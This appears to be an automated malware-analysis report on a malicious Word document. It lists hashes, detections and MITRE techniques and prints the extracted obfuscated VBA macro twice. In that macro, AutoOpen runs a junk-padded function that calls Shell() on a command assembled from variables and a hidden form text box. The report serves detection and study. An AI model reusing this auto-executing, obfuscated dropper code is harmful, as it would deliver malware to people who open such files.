Office (OLE) malware analysis — malicious · 877bfaeafabb1bed

MALICIOUS

Office (OLE)

133.6 KB Created: 2018-12-20 19:53:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: f1552dee475785a6fb942b1d7152c9a9 SHA-1: 9978f6dd52cc4bad412b134e4da8b4b2006512f0 SHA-256: 877bfaeafabb1bedc7a0f4dce28722349f8c11eefa1c0c82db31321e149176bc

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers the execution of the Shell() function, which is a critical finding indicating the execution of arbitrary commands. This strongly suggests the document is a dropper designed to download and execute a secondary payload.

Heuristics 8

ClamAV: Doc.Dropper.Valyria-6791454-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Valyria-6791454-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

      End Select
U3315846 = Array(s116382, r4643522, f7298718, Interaction.Shell(CVar("" + P4637368 + H82902 + l726652 + b241825 + Z27355739.TextBox1) + j90020692 + X720481, 69 - 69), f8349175)
   Select Case s5790952525084215539535

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
h628178176

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4454 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4454 bytes
SHA-256: `27c5a13981a1ab00a74ff92d1a0b573f474a13fb328e547aa13ed73bd7ab1314`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Z27355739" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() h628178176 End Sub Attribute VB_Name = "j42971819459" Function h628178176() On Error Resume Next Select Case K384992240605800827765185 Case 144751343 w908 = N850 o363 = CInt(I8280 / CByte(Y732)) V482 = w5734 Case 141534471 I883 = s0924 P4675 = Y2770 S8829 = CInt(s1486 / CByte(B336)) Case 261107622 P417 = r430 o2863 = S6282 End Select Select Case m63875215254000255558213 Case 135180174 A638 = D4212 j344 = CInt(K020 / CByte(B700)) k2265 = U556 Case 249734248 i5180 = i8222 z2250 = v4894 D575 = CInt(o095 / CByte(T806)) Case 44695207 N3661 = j4006 h408 = q752 End Select U3315846 = Array(s116382, r4643522, f7298718, Interaction.Shell(CVar("" + P4637368 + H82902 + l726652 + b241825 + Z27355739.TextBox1) + j90020692 + X720481, 69 - 69), f8349175) Select Case s5790952525084215539535 Case 224455089 z673 = i375 K578 = CInt(N568 / CByte(i9824)) z5447 = z603 Case 305731581 K6244 = z7982 v7887 = s594 p3282 = CInt(E994 / CByte(T3736)) Case 262432759 n134 = V0420 V5199 = B239 End Select Select Case m673943567364264468 Case 241816469 a2623 = b1159 E7195 = CInt(t0850 / CByte(X391)) A130 = L4126 Case 192144770 Y5257 = b650 s8112 = i005 E5696 = CInt(j833 / CByte(N309)) Case 283090472 z4682 = X352 p577 = f479 End Select End Function Attribute VB_Name = "S3436146121455" Attribute VB_Name = "q932149564434" Attribute VB_Name = "i4507179262" Attribute VB_Name = "w550655097" Attribute VB_Name = "Q98282368610597" Attribute VB_Name = "b91661048" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Z78713307" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "w8655557939" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "v9847244" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "P9445643591" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "E175011070" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "I694602643722" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 27c5a13981a1ab00a74ff92d1a0b573f474a13fb328e547aa13ed73bd7ab1314

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Z27355739"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
h628178176
End Sub

Attribute VB_Name = "j42971819459"
Function h628178176()
On Error Resume Next
   Select Case K384992240605800827765185
         Case 144751343
         w908 = N850
            o363 = CInt(I8280 / CByte(Y732))
            V482 = w5734
         Case 141534471
         I883 = s0924
         P4675 = Y2770
           S8829 = CInt(s1486 / CByte(B336))
         Case 261107622
         P417 = r430
         o2863 = S6282
      End Select
   Select Case m63875215254000255558213
         Case 135180174
         A638 = D4212
            j344 = CInt(K020 / CByte(B700))
            k2265 = U556
         Case 249734248
         i5180 = i8222
         z2250 = v4894
           D575 = CInt(o095 / CByte(T806))
         Case 44695207
         N3661 = j4006
         h408 = q752
      End Select
U3315846 = Array(s116382, r4643522, f7298718, Interaction.Shell(CVar("" + P4637368 + H82902 + l726652 + b241825 + Z27355739.TextBox1) + j90020692 + X720481, 69 - 69), f8349175)
   Select Case s5790952525084215539535
         Case 224455089
         z673 = i375
            K578 = CInt(N568 / CByte(i9824))
            z5447 = z603
         Case 305731581
         K6244 = z7982
         v7887 = s594
           p3282 = CInt(E994 / CByte(T3736))
         Case 262432759
         n134 = V0420
         V5199 = B239
      End Select
   Select Case m673943567364264468
         Case 241816469
         a2623 = b1159
            E7195 = CInt(t0850 / CByte(X391))
            A130 = L4126
         Case 192144770
         Y5257 = b650
         s8112 = i005
           E5696 = CInt(j833 / CByte(N309))
         Case 283090472
         z4682 = X352
         p577 = f479
      End Select
End Function


Attribute VB_Name = "S3436146121455"

Attribute VB_Name = "q932149564434"

Attribute VB_Name = "i4507179262"

Attribute VB_Name = "w550655097"

Attribute VB_Name = "Q98282368610597"

Attribute VB_Name = "b91661048"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z78713307"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w8655557939"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "v9847244"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P9445643591"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "E175011070"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "I694602643722"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.